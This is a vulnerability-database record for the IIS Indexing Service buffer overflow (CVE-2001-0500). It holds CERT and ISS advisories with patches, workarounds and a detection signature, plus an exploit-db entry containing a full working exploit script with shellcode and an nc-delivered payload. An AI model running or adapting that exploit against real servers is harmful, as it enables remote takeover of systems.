\n\n * <http://www.microsoft.com/technet/security/bulletin/ms01-033.asp>\n * <http://www.microsoft.com/technet/security/bulletin/ms01-044.asp>\n * <http://support.microsoft.com/support/kb/articles/Q300/9/72.ASP>\n * <http://www.eeye.com/html/Research/Advisories/AD20010618.html>\n * <http://www.microsoft.com/technet/security/iis5chk.asp>\n * <http://www.microsoft.com/technet/security/tools.asp>\n * <http://www.securityfocus.com/bid/2880>\n\n### Acknowledgements\n\nOur thanks to Microsoft Corporation and eEye Digital Security for contributing technical information about this vulnerability.\n\nThis document was written by Jeffrey 
S. Havrilla\n\n### Other Information\n\n**CVE IDs:** | [CVE-2001-0500](<http://web.nvd.nist.gov/vuln/detail/CVE-2001-0500>) \n---|--- \n**CERT Advisory:** | [CA-2001-13 ](<http://www.cert.org/advisories/CA-2001-13.html>) \n**Severity Metric:** | 69.30 \n**Date Public:** | 2001-06-18 \n**Date First Published:** | 2001-06-19 \n**Date Last Updated: ** | 2001-08-16 14:28 UTC \n**Document Revision: ** | 30 \n", "modified": "2001-08-16T14:28:00", "published": "2001-06-19T00:00:00", "id": "VU:952336", "href": "https://www.kb.cert.org/vuls/id/952336", "type": "cert", "title": "Microsoft Index Server/Indexing Service used by IIS 4.0/5.0 contains unchecked buffer used when encoding double-byte characters", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:04", "bulletinFamily": "software", "cvelist": ["CVE-2001-0500"], "description": "CERT Advisory CA-2001-13 Buffer Overflow In IIS Indexing Service DLL\r\n\r\n Original release date: June 19, 2001\r\n Last revised: --\r\n Source: CERT/CC\r\n\r\n A complete revision history is at the end of this file.\r\n\r\nSystems Affected\r\n\r\n * Systems running Microsoft Windows NT 4.0 with IIS 4.0 or IIS 5.0\r\n enabled\r\n * Systems running Microsoft Windows 2000 (Professional, Server,\r\n Advanced Server, Datacenter Server)\r\n * Systems running beta versions of Microsoft Windows XP\r\n\r\nOverview\r\n\r\n A vulnerability exists in the Indexing Services used by Microsoft IIS\r\n 4.0 and IIS 5.0 running on Windows NT, Windows 2000, and beta versions\r\n of Windows XP. This vulnerability allows a remote intruder to run\r\n arbitrary code on the victim machine.\r\n\r\n Since specific technical details on how to create an exploit are\r\n publicly available for this vulnerability, system administrators\r\n should apply fixes or workarounds on affected systems as soon as\r\n possible.\r\n\r\nI. 
Description\r\n\r\n There is a remotely exploitable buffer overflow in one of the ISAPI\r\n extensions installed with most versions of IIS 4.0 and 5.0 (The\r\n specific Internet/Indexing Service Application Programming Interface\r\n extension is IDQ.DLL). An intruder exploiting this vulnerability may\r\n be able to execute arbitrary code in the Local System security\r\n context. This essentially can give the attacker complete control of\r\n the victim system.\r\n\r\n This vulnerability was discovered by eEye Digital Security. Microsoft\r\n has released the following bulletin regarding this issue:\r\n\r\n http://www.microsoft.com/technet/security/bulletin/MS01-033.asp\r\n\r\n Affected versions of Windows include Windows NT 4.0 (installed with\r\n IIS 4.0 and Index Server 2.0), Windows 2000 (Server and Professional\r\n with IIS 5.0 installed), and Windows 2000 Datacenter Server OEM\r\n distributions; however, not all of these instances are vulnerable by\r\n default. The beta versions of Windows XP are vulnerable by default.\r\n\r\n The only precondition for exploiting this vulnerability is that an IIS\r\n server is running with script mappings for Internet Data\r\n Administration (.ida) and Internet Data Query (.idq) files. The\r\n Indexing Services do not need to be running. As stated by Microsoft in\r\n MS01-033:\r\n\r\n The buffer overrun occurs before any indexing functionality is\r\n requested. As a result, even though idq.dll is a component of\r\n Index Server/Indexing Service, the service would not need to be\r\n running in order for an attacker to exploit the vulnerability.\r\n As long as the script mapping for .idq or .ida files were\r\n present, and the attacker were able to establish a web session,\r\n he could exploit the vulnerability.\r\n\r\n This vulnerability has been assigned the identifier CAN-2001-0500 by\r\n the Common Vulnerabilities and Exposures (CVE) group:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0500\r\n\r\nII. 
Impact\r\n\r\n Anyone who can reach a vulnerable web server can execute arbitrary\r\n code in the Local System security context. This results in the\r\n intruder gaining complete control of the system. Note that this may be\r\n significantly more serious than a simple "web defacement."\r\n\r\nIII. Solution\r\n\r\nApply a patch from your vendor\r\n\r\n Apply patches for vulnerable Windows NT 4.0 and Windows 2000 systems:\r\n\r\n For Windows NT 4.0:\r\n\r\n http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833\r\n\r\n For Windows 2000 Professional, Server, and Advanced Server:\r\n\r\n http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800 \r\n\r\n These patches supersede the ones previously provided in Microsoft\r\n Security Bulletins MS01-025 and MS00-006.\r\n\r\n Users of Windows 2000 Datacenter Server software should contact their\r\n original equipment manufacturer (OEM) for patches. A list of OEM\r\n providers may be found here:\r\n\r\n http://www.microsoft.com/windows2000/datacenter/howtobuy/purchasing/oems.asp\r\n\r\nWorkarounds\r\n\r\n Users of beta copies of Windows XP should upgrade to a newer version\r\n of the software when it becomes available.\r\n\r\n All affected versions of IIS/Indexing Services can be protected\r\n against exploits of this vulnerability by removing script mappings\r\n for Internet Data Administration (.ida) and Internet Data Query (.idq)\r\n files. However, such mappings may be recreated when installing other\r\n related software components.\r\n\r\nAppendix A. Vendor Information\r\n\r\nMicrosoft Corporation\r\n\r\n The following documents regarding this vulnerability are available\r\n from Microsoft:\r\n\r\n http://www.microsoft.com/technet/security/bulletin/MS01-033.asp\r\n\r\nReferences\r\n\r\n 1. 
VU#952336: Microsoft Index Server/Indexing Service used by IIS\r\n 4.0/5.0 contains unchecked buffer used when encoding double-byte\r\n characters CERT/CC, 06/19/2001,\r\n\r\n https://www.kb.cert.org/vuls/id/952336\r\n\r\n 2. Additional advice on securing IIS web servers is available from\r\n\r\n http://www.microsoft.com/technet/security/iis5chk.asp\r\n http://www.microsoft.com/technet/security/tools.asp\r\n\r\n Feedback concerning this document may be directed to Jeffrey S.\r\n Havrilla.\r\n ______________________________________________________________________\r\n\r\n This document is available from:\r\n\r\n http://www.cert.org/advisories/CA-2001-13.html\r\n\r\n ______________________________________________________________________\r\n\r\nCERT/CC Contact Information\r\n\r\n Email: cert@cert.org\r\n Phone: +1 412-268-7090 (24-hour hotline)\r\n Fax: +1 412-268-6989\r\n Postal address:\r\n CERT Coordination Center\r\n Software Engineering Institute\r\n Carnegie Mellon University\r\n Pittsburgh PA 15213-3890\r\n U.S.A.\r\n\r\n CERT personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4)\r\n Monday through Friday; they are on call for emergencies during other\r\n hours, on U.S. holidays, and on weekends.\r\n\r\n Using encryption\r\n\r\n We strongly urge you to encrypt sensitive information sent by email.\r\n Our public PGP key is available from\r\n\r\n http://www.cert.org/CERT_PGP.key\r\n\r\n If you prefer to use DES, please call the CERT hotline for more\r\n information.\r\n\r\n Getting security information\r\n\r\n CERT publications and other security information are available from\r\n our web site\r\n\r\n http://www.cert.org/\r\n\r\n To subscribe to the CERT mailing list for advisories and bulletins,\r\n send email to majordomo@cert.org. 
Please include in the body of your\r\n message\r\n\r\n subscribe cert-advisory\r\n\r\n * "CERT" and "CERT Coordination Center" are registered in the U.S.\r\n Patent and Trademark Office.\r\n ______________________________________________________________________\r\n\r\n NO WARRANTY\r\n Any material furnished by Carnegie Mellon University and the Software\r\n Engineering Institute is furnished on an "as is" basis. Carnegie\r\n Mellon University makes no warranties of any kind, either expressed or\r\n implied as to any matter including, but not limited to, warranty of\r\n fitness for a particular purpose or merchantability, exclusivity or\r\n results obtained from use of the material. Carnegie Mellon University\r\n does not make any warranty of any kind with respect to freedom from\r\n patent, trademark, or copyright infringement.\r\n _________________________________________________________________\r\n\r\n Conditions for use, disclaimers, and sponsorship information\r\n\r\n Copyright 2001 Carnegie Mellon University.\r\n\r\n Revision History\r\nJun 19, 2001: Initial Release\r\n", "edition": 1, "modified": "2001-06-20T00:00:00", "published": "2001-06-20T00:00:00", "id": "SECURITYVULNS:DOC:1738", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:1738", "title": "Advisory CA-2001-13", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:04", "bulletinFamily": "software", "cvelist": ["CVE-2001-0500"], "description": "Internet Security Systems Security Alert\r\nJune 19, 2001\r\n\r\nRemote IIS Index Server ISAPI Extension Buffer Overflow\r\n\r\nSynopsis:\r\n\r\nISS X-Force is aware of a serious vulnerability that can be used to\r\nattack all recent versions of Microsoft Internet Information Server\r\n(IIS). A flaw exists in ISAPI Index Server extension query processing\r\nthat may lead to Web page defacement and theft of sensitive or \r\nconfidential information. 
In addition, this vulnerability can be used in\r\nconjunction with other exploits to further compromise affected systems. \r\n\r\nDescription:\r\n\r\nInternet Services Application Programming Interface (ISAPI ) extensions \r\nallow for additional functionality to be added to IIS. The ISAPI Index\r\nServer extension provides a hook to integrate Microsoft Index Server \r\nwith IIS. The vulnerability is introduced during the IIS installation\r\nprocess, when two Index Server Dynamic Link Library (DLL ) files are\r\ninstalled. Index Server itself does not need to be installed for \r\nattackers to exploit this vulnerability because these DLL files are\r\nmapped by IIS default installations. \r\n\r\nWhen a vulnerable IIS installation receives an Index Server ISAPI query,\r\nIIS parses the query to determine which extension corresponds to the \r\nrequest. Once the query is mapped to the correct extension, the body of\r\nthe request is parsed. The vulnerability is caused by a lack of bounds\r\nchecking on the length of the Index Server ISAPI request. Two potential\r\nattack scenarios exist. A Denial of Service (DoS) attack can be \r\nlaunched against IIS by sending a very long string to the Index Server\r\nISAPI extension. Additionally, an attacker may use an advanced exploit\r\nto send a specially-crafted long request to execute arbitrary code on\r\nthe vulnerable system. The Index Server ISAPI extension runs under the\r\n"System" security context. Any successful attack will run under this \r\ncontext and may lead to unrestricted access of the target machine and \r\nits contents.\r\n\r\n\r\nAffected Versions:\r\n\r\nMicrosoft Windows NT version 4.0\r\n Running IIS 4.0\r\nMicrosoft Windows 2000 Professional, Server, Advanced Server and \r\nDatacenter Server\r\n Running IIS 5.0\r\n\r\nRecommendations:\r\n\r\nDetailed exploit information has been released, and ISS X-Force urges\r\nall administrators to download and apply the following patches made\r\navailable by Microsoft. 
\r\n\r\nFor Microsoft Windows NT version 4.0:\r\nhttp://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833\r\n\r\nFor Microsoft Windows 2000 Professional, Server and Advanced Server:\r\nhttp://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800\r\n\r\nFor Microsoft Windows 2000 Datacenter Server:\r\nPatches for Windows 2000 Datacenter Server are hardware-specific and \r\navailable from the original equipment manufacturer.\r\n\r\nFor more information on this vulnerability please refer to the Microsoft\r\nSecurity Bulletin at:\r\nhttp://www.microsoft.com/technet/security/bulletin/MS01-033.asp\r\n\r\n\r\nISS RealSecure intrusion detection customers may use the following \r\nuser-defined signature to detect access attempts to .ida files. Follow\r\nthe instructions below to apply the user-defined signature to your \r\npolicy. \r\n\r\n- From the Sensor window:\r\n1. Right-click on the sensor and select 'Properties'.\r\n2. Choose a policy you want to use, and click 'Customize'.\r\n3. Select the 'User Defined Events' tab.\r\n4. Click 'Add' on the right hand side of the dialog box.\r\n5. Create a User Defined Event.\r\n6. Type in a name of the event, such as 'IDA file access attempt'.\r\n7. In the 'Context' field for each event, select 'URL_Data'. \r\n In the 'String' field, type the following string:\r\n \.ida$ \r\n8. Click 'Save', and then 'Close'.\r\n9. Click 'Apply to Sensor' or 'Apply to Engine', depending on the\r\n version of RealSecure you are using.\r\n\r\nISS Internet Scanner X-Press Update version 4.10 provides assessment\r\ncapability for this vulnerability. \r\n\r\nInternet Scanner X-Press Update version 4.10 will be available later\r\nthis week for download at the following URL:\r\nhttp://www.iss.net/db_data/xpu/IS.php\r\n\r\nThe next X-Press Update for ISS RealSecure Network Sensor will contain a\r\nsignature to detect this vulnerability.\r\n\r\nNetworkICE provides an update for BlackICE products to detect this \r\nvulnerability. 
ISS X-Force recommends that all BlackICE customers refer\r\nto the following URL for information regarding the detection of this \r\nvulnerability: \r\nhttp://www.networkice.com/downloads/agent_detection_update25eq.html\r\n\r\n\r\nAdditional Information:\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CAN-2001-0500 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org), which standardizes names for \r\nsecurity problems.\r\n\r\nFor additional information about this vulnerability, please reference:\r\nhttp://www.eeye.com/html/Research/Advisories/AD20010618.html\r\n\r\n______\r\n\r\nAbout Internet Security Systems (ISS) \r\n\r\nInternet Security Systems is the leading global provider of security \r\nmanagement solutions for the Internet, protecting digital assets and \r\nensuring safe and uninterrupted e-business. With its industry-leading \r\nintrusion detection and vulnerability assessment, remote managed \r\nsecurity services, and strategic consulting and education offerings, ISS\r\nis a trusted security provider to more than 8,000 customers worldwide\r\nincluding 21 of the 25 largest U.S. commercial banks and the top 10 U.S. \r\ntelecommunications companies. Founded in 1994, ISS is headquartered in \r\nAtlanta, GA, with additional offices throughout North America and \r\ninternational operations in Asia, Australia, Europe, Latin America and\r\nthe Middle East. For more information, visit the Internet Security \r\nSystems web site at www.iss.net or call 888-901-7477.\r\n\r\n\r\nCopyright (c) 2001 Internet Security Systems, Inc.\r\n\r\nPermission is hereby granted for the redistribution of this Alert\r\nelectronically. It is not to be edited in any way without express\r\nconsent of the X-Force. 
If you wish to reprint the whole or any part of\r\nthis Alert in any other medium excluding electronic medium, please\r\ne-mail xforce@iss.net for permission.\r\n\r\nDisclaimer\r\n\r\nThe information within this paper may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties with regard to this information. In no event shall the\r\nauthor be liable for any damages whatsoever arising out of or in \r\nconnection with the use or spread of this information. Any use of this\r\ninformation is at the user's own risk.\r\n\r\n\r\nX-Force PGP Key available at: http://xforce.iss.net/sensitive.php\r\nas well as on MIT's PGP key server and PGP.com's key server.\r\n\r\nPlease send suggestions, updates, and comments to: X-Force\r\nxforce@iss.net of Internet Security Systems, Inc.\r\n", "edition": 1, "modified": "2001-06-20T00:00:00", "published": "2001-06-20T00:00:00", "id": "SECURITYVULNS:DOC:1737", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:1737", "title": "ISSalert: ISS Alert: Remote IIS Index Server ISAPI Extension Buffer Overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T15:18:40", "description": "MS Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (3). CVE-2001-0500. Remote exploit for windows platform", "published": "2001-06-18T00:00:00", "type": "exploitdb", "title": "Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow 3", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2001-06-18T00:00:00", "id": "EDB-ID:20932", "href": "https://www.exploit-db.com/exploits/20932/", "sourceData": "source: http://www.securityfocus.com/bid/2880/info\r\n \r\nWindows Index Server ships with Windows NT 4.0 Option Pack; Windows Indexing Service ships with Windows 2000. 
An unchecked buffer resides in the 'idq.dll' ISAPI extension associated with each service. A maliciously crafted request could allow arbitrary code to run on the host in the Local System context.\r\n \r\nNote that Index Server and Indexing Service do not need to be running for an attacker to exploit this issue. Since 'idq.dll' is installed by default when IIS is installed, IIS would need to be the only service running.\r\n \r\nNote also that this vulnerability is currently being exploited by the 'Code Red' worm. In addition, all products that run affected versions of IIS are also vulnerable.\r\n\r\n#!/bin/sh\r\n# .ida nasty exploit\r\n# mat@hacksware.com,mat@monkey.org\r\n# http://monkey.org/~mat\r\n#\r\n# If this exploit succeeds, you can get into the machine through port 8008\r\n# shellcode generated by DeepZone generator\r\n# I only tested this code under W2k Korean Version, so the offset value may vary through systems, you can get the offset\r\nvalue with WinDbg tool included in Windows SDK\r\n#\r\n# How to get the offset:\r\n# 1. start windbg and attach to inetinfo.exe process. and go(F5)\r\n# 2. using this script attack the test machine\r\n# 3. if the offset in this script is not valid, then inetinfo.exe will be got break.\r\n# 4. you can search the shellcode position with following command\r\n# s 10000 Lfffff 0x68 0x5e 0x56 0xc3 0x90\r\n# 5. 
if the shellcode position is 0xaabbccdd\r\n# then you can change the %u...%u...to %uccdd%uaabb\r\n\r\ntarget=$1\r\nSHELLCODE=`printf\r\n\"\\x68\\x5e\\x56\\xc3\\x90\\x54\\x59\\xff\\xd1\\x58\\x33\\xc9\\xb1\\x1c\\x90\\x90\\x90\\x90\\x03\\xf1\\x56\\x5f\\x33\\xc9\\x66\\xb9\\x95\\x04\\x90\\x90\\x9\r\n0\\xac\\x34\\x99\\xaa\\xe2\\xfa\\x71\\x99\\x99\\x99\\x99\\xc4\\x18\\x74\\x40\\xb8\\xd9\\x99\\x14\\x2c\\x6b\\xbd\\xd9\\x99\\x14\\x24\\x63\\xbd\\xd9\\x99\\xf\r\n3\\x9e\\x09\\x09\\x09\\x09\\xc0\\x71\\x4b\\x9b\\x99\\x99\\x14\\x2c\\xb3\\xbc\\xd9\\x99\\x14\\x24\\xaa\\xbc\\xd9\\x99\\xf3\\x93\\x09\\x09\\x09\\x09\\xc0\\x7\r\n1\\x23\\x9b\\x99\\x99\\xf3\\x99\\x14\\x2c\\x40\\xbc\\xd9\\x99\\xcf\\x14\\x2c\\x7c\\xbc\\xd9\\x99\\xcf\\x14\\x2c\\x70\\xbc\\xd9\\x99\\xcf\\x66\\x0c\\xaa\\xb\r\nc\\xd9\\x99\\xf3\\x99\\x14\\x2c\\x40\\xbc\\xd9\\x99\\xcf\\x14\\x2c\\x74\\xbc\\xd9\\x99\\xcf\\x14\\x2c\\x68\\xbc\\xd9\\x99\\xcf\\x66\\x0c\\xaa\\xbc\\xd9\\x9\r\n9\\x5e\\x1c\\x6c\\xbc\\xd9\\x99\\xdd\\x99\\x99\\x99\\x14\\x2c\\x6c\\xbc\\xd9\\x99\\xcf\\x66\\x0c\\xae\\xbc\\xd9\\x99\\x14\\x2c\\xb4\\xbf\\xd9\\x99\\x34\\xc\r\n9\\x66\\x0c\\xca\\xbc\\xd9\\x99\\x14\\x2c\\xa8\\xbf\\xd9\\x99\\x34\\xc9\\x66\\x0c\\xca\\xbc\\xd9\\x99\\x14\\x2c\\x68\\xbc\\xd9\\x99\\x14\\x24\\xb4\\xbf\\xd\r\n9\\x99\\x3c\\x14\\x2c\\x7c\\xbc\\xd9\\x99\\x34\\x14\\x24\\xa8\\xbf\\xd9\\x99\\x32\\x14\\x24\\xac\\xbf\\xd9\\x99\\x32\\x5e\\x1c\\xbc!\r\n\\xbf\\xd9\\x99\\x99\\x99\\x99\\x99\\x5e\\x1c\\xb8\\xbf\\xd9\\x99\\x98\\x98\\x99\\x99\\x14\\x2c\\xa0\\xbf\\xd9\\x99\\xcf\\x14\\x2c\\x6c\\xbc\\xd9\\x99\\xcf\r\n\\xf3\\x99\\xf3\\x99\\xf3\\x89\\xf3\\x98\\xf3\\x99\\xf3\\x99\\x14\\x2c\\xd0\\xbf\\xd9\\x99\\xcf\\xf3\\x99\\x66\\x0c\\xa2\\xbc\\xd9\\x99\\xf1\\x99\\xb9\\x99\r\n\\x99\\x09\\xf1\\x99\\x9b\\x99\\x99\\x66\\x0c\\xda\\xbc\\xd9\\x99\\x10\\x1c\\xc8\\xbf\\xd9\\x99\\xaa\\x59\\xc9\\xd9\\xc9\\xd9\\xc9\\x66\\x0c\\x63\\xbd\\xd9\r\n\\x99\\xc9\\xc2\\xf3\\x89\\x14\\x2c\\x50\\xbc\\xd9\\x99\\xcf\\xca\\x66\\x0c\\x67\\xbd\\xd9\\x99\\xf3\\x9a\\xca\\x66\\x0c\\x9b\\xbc\\xd9\\
x99\\x14\\x2c\\xcc\r\n\\xbf\\xd9\\x99\\xcf\\x14\\x2c\\x50\\xbc\\xd9\\x99\\xcf\\xca\\x66\\x0c\\x9f\\xbc\\xd9\\x99\\x14\\x24\\xc0\\xbf\\xd9\\x99\\x32\\xaa\\x59\\xc9\\x14\\x24\\xfc\r\n\\xbf\\xd9\\x99\\xce\\xc9\\xc9\\xc9\\x14\\x2c\\x70\\xbc\\xd9\\x99\\x34\\xc9\\x66\\x0c\\xa6\\xbc\\xd9\\x99\\xf3\\xa9\\x66\\x0c\\xd6\\xbc\\xd9\\x99\\x72\\xd4\r\n\\x09\\x09\\x09\\xaa\\x59\\xc9\\x14\\x24\\xfc\\xbf\\xd9\\x99\\xce\\xc9\\xc9\\xc9\\x14\\x2c\\x70\\xbc\\xd9\\x99\\x34\\xc9\\x66\\x0c\\xa6\\xbc\\xd9\\x99\\xf3\r\n\\xa9\\x66\\x0c\\xd6\\xbc\\xd9\\x99\\x1a\\x24\\xfc\\xbf\\xd9\\x99\\x9b\\x96\\x1b\\x8e\\x98\\x99\\x99\\x18\\x24\\xfc\\xbf\\xd9\\x99\\x98\\xb9\\x99\\x99\\xe!\r\nb\\x97\\x09\\x09\\x09\\x09\\x5e\\x1c\\xfc\\xbf\\xd9\\x99\\x99\\xb9\\x99\\x99\\xf3\\x99\\x12\\x1c\\xfc\\xbf\\xd9\\x99\\x14\\x24\\xfc\\xbf\\xd9\\x99\\xce\\xc\r\n9\\x12\\x1c\\xc8\\xbf\\xd9\\x99\\xc9\\x14\\x2c\\x70\\xbc\\xd9\\x99\\x34\\xc9\\x66\\x0c\\xde\\xbc\\xd9\\x99\\xf3\\xa9\\x66\\x0c\\xd6\\xbc\\xd9\\x99\\x12\\x1\r\nc\\xfc\\xbf\\xd9\\x99\\xf3\\x99\\xc9\\x14\\x2c\\xc8\\xbf\\xd9\\x99\\x34\\xc9\\x14\\x2c\\xc0\\xbf\\xd9\\x99\\x34\\xc9\\x66\\x0c\\x93\\xbc\\xd9\\x99\\xf3\\x9\r\n9\\x14\\x24\\xfc\\xbf\\xd9\\x99\\xce\\xf3\\x99\\xf3\\x99\\xf3\\x99\\x14\\x2c\\x70\\xbc\\xd9\\x99\\x34\\xc9\\x66\\x0c\\xa6\\xbc\\xd9\\x99\\xf3\\xa9\\x66\\x0\r\nc\\xd6\\xbc\\xd9\\x99\\xaa\\x50\\xa0\\x14\\xfc\\xbf\\xd9\\x99\\x96\\x1e\\xfe\\x66\\x66\\x66\\xf3\\x99\\xf1\\x99\\xb9\\x99\\x99\\x09\\x14\\x2c\\xc8\\xbf\\xd\r\n9\\x99\\x34\\xc9\\x14\\x2c\\xc0\\xbf\\xd9\\x99\\x34\\xc9\\x66\\x0c\\x97\\xbc\\xd9\\x99\\x10\\x1c\\xf8\\xbf\\xd9\\x99\\xf3\\x99\\x14\\x24\\xfc\\xbf\\xd9\\x9\r\n9\\xce\\xc9\\x14\\x2c\\xc8\\xbf\\xd9\\x99\\x34\\xc9\\x14\\x2c\\x74\\xbc\\xd9\\x99\\x34\\xc9\\x66\\x0c\\xd2\\xbc\\xd9\\x99\\xf3\\xa9\\x66\\x0c\\xd6\\xbc\\xd\r\n9\\x99\\xf3\\x99\\x12\\x1c\\xf8\\xbf\\xd9\\x99\\x14\\x24\\xfc\\xbf\\xd9\\x99\\xce\\xc9\\x12\\x1c\\xc8\\xbf\\xd9\\x99\\xc9\\x14\\x2c\\x70\\xbc\\xd9\\x99\\x!\r\n34\\xc9\\x66\\x0c\\xde\\xbc\\xd9\\x99\\xf3\\xa9\\x66\\x0c\\xd6\\xbc\\x
d9\\x99\\x70\\x20\\x67\\x66\\x66\\x14\\x2c\\xc0\\xbf\\xd9\\x99\\x34\\xc9\\x66\\x0c\\x\r\n8b\\xbc\\xd9\\x99\\x14\\x2c\\xc4\\xbf\\xd9\\x99\\x34\\xc9\\x66\\x0c\\x8b\\xbc\\xd9\\x99\\xf3\\x99\\x66\\x0c\\xce\\xbc\\xd9\\x99\\xc8\\xcf\\xf1\\xe5\\x89\\x\r\n99\\x98\\x09\\xc3\\x66\\x8b\\xc9\\xc2\\xc0\\xce\\xc7\\xc8\\xcf\\xca\\xf1\\xad\\x89\\x99\\x98\\x09\\xc3\\x66\\x8b\\xc9\\x35\\x1d\\x59\\xec\\x62\\xc1\\x32\\x\r\nc0\\x7b\\x70\\x5a\\xce\\xca\\xd6\\xda\\xd2\\xaa\\xab\\x99\\xea\\xf6\\xfa\\xf2\\xfc\\xed\\x99\\xfb\\xf0\\xf7\\xfd\\x99\\xf5\\xf0\\xea\\xed\\xfc\\xf7\\x99\\x\r\nf8\\xfa\\xfa\\xfc\\xe9\\xed\\x99\\xea\\xfc\\xf7\\xfd\\x99\\xeb\\xfc\\xfa\\xef\\x99\\xfa\\xf5\\xf6\\xea\\xfc\\xea\\xf6\\xfa\\xf2\\xfc\\xed\\x99\\xd2\\xdc\\x\r\ncb\\xd7\\xdc\\xd5\\xaa\\xab\\x99\\xda\\xeb\\xfc\\xf8\\xed\\xfc\\xc9\\xf0\\xe9\\xfc\\x99\\xde\\xfc\\xed\\xca\\xed\\xf8\\xeb\\xed\\xec\\xe9\\xd0\\xf7\\xff\\x\r\nf6\\xd8\\x99\\xda\\xeb\\xfc\\xf8\\xed\\xfc\\xc9\\xeb\\xf6\\xfa\\xfc\\xea\\xea\\xd8\\x99\\xc9\\xfc\\xfc\\xf2\\xd7\\xf8\\xf4\\xfc\\xfd\\xc9\\xf0\\xe9\\xfc\\x\r\n99\\xde\\xf5\\xf6\\xfb\\xf8\\xf5\\xd8\\xf5\\xf5\\xf6\\xfa\\x99\\xcb\\xfc\\xf8\\xfd\\xdf\\xf0\\xf5\\xfc\\x99\\xce\\xeb\\xf0\\xed\\xfc\\xdf\\xf0\\xf5\\xfc\\!\r\nx99\\xca\\xf5\\xfc\\xfc\\xe9\\x99\\xda\\xf5\\xf6\\xea\\xfc\\xd1\\xf8\\xf7\\xfd\\xf5\\xfc\\x99\\xdc\\xe1\\xf0\\xed\\xc9\\xeb\\xf6\\xfa\\xfc\\xea\\xea\\x99\\\r\nxda\\xf6\\xfd\\xfc\\xfd\\xb9\\xfb\\xe0\\xb9\\xe5\\xc3\\xf8\\xf7\\xb9\\xa5\\xf0\\xe3\\xf8\\xf7\\xd9\\xfd\\xfc\\xfc\\xe9\\xe3\\xf6\\xf7\\xfc\\xb7\\xf6\\xeb\\\r\nxfe\\xa7\\x9b\\x99\\x86\\xd1\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x95\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x98\\x99\\x99\\x99\\x99\\\r\nx99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\\r\nx99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\\r\nx99
\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\\r\nx99\\x99\\x99\\x99\\x99\\x99\\xda\\xd4\\xdd\\xb7\\xdc\\xc1\\xdc\\x99\\x99\\x99\\x99\\x99\\x89\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\\r\nx99\\x99\\x99\\x99\\x99\\x99\\x99\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"`\r\n#for w2k no sp:\r\n#GET_LINE=\"GET /test.ida?`perl -e 'print \"N\"x230'`%u0101%u00b5%u0101%u00b5%u0101%u00b5%u0101%u00b5=x HTTP/1.0\"\r\n#for w2k sp2:\r\nGET_LINE=\"GET /test.ida?`perl -e 'print \"N\"x230'`%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6=x HTTP/1.0\"\r\nnc $target 80 <<EOF\r\n`echo $GET_LINE`\r\nyahoo: `perl -e 'print \"\\x90\"x11800'`$SHELLCODE\r\n\r\nEOF", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20932/"}, {"lastseen": "2016-02-01T23:56:44", "description": "Microsoft IIS 5.0 IDQ Path Overflow. CVE-2001-0500. Remote exploit for windows platform", "published": "2010-06-15T00:00:00", "type": "exploitdb", "title": "Microsoft IIS 5.0 IDQ Path Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2010-06-15T00:00:00", "id": "EDB-ID:16472", "href": "https://www.exploit-db.com/exploits/16472/", "sourceData": "##\r\n# $Id: ms01_033_idq.rb 9525 2010-06-15 07:18:08Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
